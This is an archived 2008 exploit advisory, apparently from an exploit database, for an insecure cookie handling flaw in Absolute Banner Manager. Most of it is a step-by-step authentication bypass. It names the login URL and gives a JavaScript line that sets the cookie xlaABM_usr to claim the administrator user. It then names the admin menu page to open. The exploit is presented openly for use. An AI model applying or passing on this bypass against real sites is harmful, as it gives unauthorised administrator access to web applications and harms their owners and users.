id: 3973
date: 10/31/2008
title: Absolute Banner Manager Insecure Cookie Handling Vulnerability
author: Hakxer
cves: 

==============================================================
Absolute Banner Manager Insecure Cookie Handling Vulnerability
==============================================================


[~] Author : Hakxer
[~] Type Gap : Insecure Cookie Handling
[~] script : Absolute Banner Manager [see script] http://www.xigla.com/absolutebmnet/demo.htm
[~] Team : EgY Coders 
#################################################################################################

Exploit : First go to http://www.xigla.com/absolutebmnet/demo/login.aspx
Second Execute JS Code 
[~] javascript:document.cookie="xlaABM_usr=userid=administrator&company=Sytem Administrator";
Now Go to http://www.xigla.com/absolutebmnet/demo/menu.aspx

--- Proud To Be A Muslim ---

# _=END=_ #



#  0day.today [2023-03-23]  #